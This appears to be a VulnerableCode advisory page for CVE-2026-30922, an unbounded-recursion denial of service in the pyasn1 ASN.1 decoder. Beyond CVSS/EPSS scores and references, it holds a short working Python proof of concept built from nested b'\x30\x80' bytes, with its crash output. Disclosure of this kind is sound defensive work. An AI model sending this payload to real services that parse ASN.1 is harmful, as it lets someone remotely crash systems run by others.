VulnerableCode Vulnerability Details

Staging Environment: Content and features may be unstable or change without notice.

Search for vulnerabilities

Vulnerability details: VCID-kth3-bvbt-gbgk

Essentials
Severities (36)
References (26)
Severity details (22)
Exploits (0)
EPSS
History (1)

Vulnerability ID	VCID-kth3-bvbt-gbgk
Aliases	CVE-2026-30922 GHSA-jr27-m4p2-rc6r
Summary	Denial of Service in pyasn1 via Unbounded Recursion ### Summary The `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with Indefinite Length (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. ### Details The vulnerability exists because the decoder iterates through the input stream and recursively calls `decodeFun` (the decoding callback) for every nested component found, without tracking or limiting the recursion depth. Vulnerable Code Locations: 1. `indefLenValueDecoder` (Line 998): ```for component in decodeFun(substrate, asn1Spec, allowEoo=True, options):``` This method handles indefinite-length constructed types. It sits inside a `while True` loop and recursively calls the decoder for every nested tag. 2. `valueDecoder` (Lines 786 and 907): ```for component in decodeFun(substrate, componentType, options):``` This method handles standard decoding when a schema is present. It contains two distinct recursive calls that lack depth checks: Line 786: Recursively decodes components of `SEQUENCE` or `SET` types. Line 907: Recursively decodes elements of `SEQUENCE OF` or `SET OF` types. 4. `_decodeComponentsSchemaless` (Line 661): ```for component in decodeFun(substrate, *options):``` This method handles decoding when no schema is provided. In all three cases, `decodeFun` is invoked without passing a `depth` parameter or checking against a global `MAX_ASN1_NESTING` limit. ### PoC ``` import sys from pyasn1.codec.ber import decoder sys.setrecursionlimit(100000) print("[] Generating Recursion Bomb Payload...") depth = 50_000 chunk = b'\x30\x80' payload = chunk * depth print(f"[] Payload size: {len(payload) / 1024:.2f} KB") print("[] Triggering Decoder...") try: decoder.decode(payload) except RecursionError: print("[!] Crashed: Recursion Limit Hit") except MemoryError: print("[!] Crashed: Out of Memory") except Exception as e: print(f"[!] Crashed: {e}") ``` ``` [] Payload size: 9.77 KB [] Triggering Decoder... [!] Crashed: Recursion Limit Hit ``` ### Impact - This is an unhandled runtime exception that typically terminates the worker process or thread handling the request. This allows a remote attacker to trivially kill service workers with a small payload (<100KB), resulting in a Denial of Service. Furthermore, in environments where recursion limits are increased, this leads to server-wide memory exhaustion. - Service Crash: Any service using `pyasn1` to parse untrusted ASN.1 data (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely. - Resource Exhaustion: The attack consumes RAM linearly with the nesting depth. A small payload (<200KB) can consume hundreds of megabytes of RAM or exhaust the stack. ### Credits Vulnerability discovered by Kevin Tu of TMIR at ByteDance.
Status	Published
Exploitability	0.5
Weighted Severity	8.0
Risk	4.0
Affected and Fixed Packages	Package Details

Weaknesses (4)

CWE-674	Uncontrolled Recursion
CWE-835	Loop with Unreachable Exit Condition ('Infinite Loop')
CWE-937	OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities
CWE-1035	OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

System	Score	Found at
cvssv3	7.5	https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30922.json
epss	0.00049	https://api.first.org/data/v1/epss?cve=CVE-2026-30922
epss	0.00049	https://api.first.org/data/v1/epss?cve=CVE-2026-30922
epss	0.00049	https://api.first.org/data/v1/epss?cve=CVE-2026-30922
epss	0.00049	https://api.first.org/data/v1/epss?cve=CVE-2026-30922
epss	0.00049	https://api.first.org/data/v1/epss?cve=CVE-2026-30922
epss	0.00049	https://api.first.org/data/v1/epss?cve=CVE-2026-30922
epss	0.00049	https://api.first.org/data/v1/epss?cve=CVE-2026-30922
epss	0.00049	https://api.first.org/data/v1/epss?cve=CVE-2026-30922
epss	0.00049	https://api.first.org/data/v1/epss?cve=CVE-2026-30922
epss	0.00049	https://api.first.org/data/v1/epss?cve=CVE-2026-30922
epss	0.00054	https://api.first.org/data/v1/epss?cve=CVE-2026-30922
epss	0.00054	https://api.first.org/data/v1/epss?cve=CVE-2026-30922
epss	0.00054	https://api.first.org/data/v1/epss?cve=CVE-2026-30922
epss	0.00073	https://api.first.org/data/v1/epss?cve=CVE-2026-30922
cvssv3.1	7.5	https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
cvssv3.1_qr	HIGH	https://github.com/advisories/GHSA-jr27-m4p2-rc6r
cvssv3.1	7.5	https://github.com/pyasn1/pyasn1
generic_textual	HIGH	https://github.com/pyasn1/pyasn1
cvssv3.1	7.5	https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0
cvssv3.1	7.5	https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0
generic_textual	HIGH	https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0
ssvc	Track	https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0
cvssv3.1	7.5	https://github.com/pyasn1/pyasn1/commit/5a49bd1fe93b5b866a1210f6bf0a3924f21572c8
generic_textual	HIGH	https://github.com/pyasn1/pyasn1/commit/5a49bd1fe93b5b866a1210f6bf0a3924f21572c8
cvssv3.1	7.5	https://github.com/pyasn1/pyasn1/releases/tag/v0.6.3
generic_textual	HIGH	https://github.com/pyasn1/pyasn1/releases/tag/v0.6.3
cvssv3.1	7.5	https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r
cvssv3.1	7.5	https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r
cvssv3.1_qr	HIGH	https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r
generic_textual	HIGH	https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r
ssvc	Track	https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r
cvssv3.1	7.5	https://nvd.nist.gov/vuln/detail/CVE-2026-30922
generic_textual	HIGH	https://nvd.nist.gov/vuln/detail/CVE-2026-30922
cvssv3.1	7.5	http://www.openwall.com/lists/oss-security/2026/03/20/4
generic_textual	HIGH	http://www.openwall.com/lists/oss-security/2026/03/20/4

Reference id	Reference type	URL
		https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30922.json
		https://api.first.org/data/v1/epss?cve=CVE-2026-30922
		https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-30922
		https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
		https://github.com/pyasn1/pyasn1
		https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0
		https://github.com/pyasn1/pyasn1/commit/5a49bd1fe93b5b866a1210f6bf0a3924f21572c8
		https://github.com/pyasn1/pyasn1/releases/tag/v0.6.3
		https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r
		https://lists.debian.org/debian-lts-announce/2026/05/msg00001.html
		https://nvd.nist.gov/vuln/detail/CVE-2026-30922
		http://www.openwall.com/lists/oss-security/2026/03/20/4
1131371		https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131371
2448553		https://bugzilla.redhat.com/show_bug.cgi?id=2448553
GHSA-jr27-m4p2-rc6r		https://github.com/advisories/GHSA-jr27-m4p2-rc6r
RHSA-2026:10184		https://access.redhat.com/errata/RHSA-2026:10184
RHSA-2026:12176		https://access.redhat.com/errata/RHSA-2026:12176
RHSA-2026:6309		https://access.redhat.com/errata/RHSA-2026:6309
RHSA-2026:6404		https://access.redhat.com/errata/RHSA-2026:6404
RHSA-2026:6568		https://access.redhat.com/errata/RHSA-2026:6568
RHSA-2026:6720		https://access.redhat.com/errata/RHSA-2026:6720
RHSA-2026:6912		https://access.redhat.com/errata/RHSA-2026:6912
RHSA-2026:6926		https://access.redhat.com/errata/RHSA-2026:6926
RHSA-2026:8437		https://access.redhat.com/errata/RHSA-2026:8437
USN-8129-1		https://usn.ubuntu.com/8129-1/
USN-8134-1		https://usn.ubuntu.com/8134-1/

No exploits are available.

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30922.json

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-18T20:16:18Z/ Found at https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/commit/5a49bd1fe93b5b866a1210f6bf0a3924f21572c8

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/releases/tag/v0.6.3

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-18T20:16:18Z/ Found at https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://nvd.nist.gov/vuln/detail/CVE-2026-30922

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at http://www.openwall.com/lists/oss-security/2026/03/20/4

Attack Vector (AV)	Attack Complexity (AC)	Privileges Required (PR)	User Interaction (UI)	Scope (S)	Confidentiality Impact (C)	Integrity Impact (I)	Availability Impact (A)
network adjacent_network local physical	low high	none low high	none required	unchanged changed	high low none	high low none	high low none

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality Impact (C)

Integrity Impact (I)

Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Exploit Prediction Scoring System (EPSS)

Percentile	0.15359
EPSS Score	0.00049
Published At	April 2, 2026, 12:55 p.m.

Date	Actor	Action	Source	VulnerableCode Version
2026-04-01T12:54:01.505385+00:00	GithubOSV Importer	Import	https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-jr27-m4p2-rc6r/GHSA-jr27-m4p2-rc6r.json	38.0.0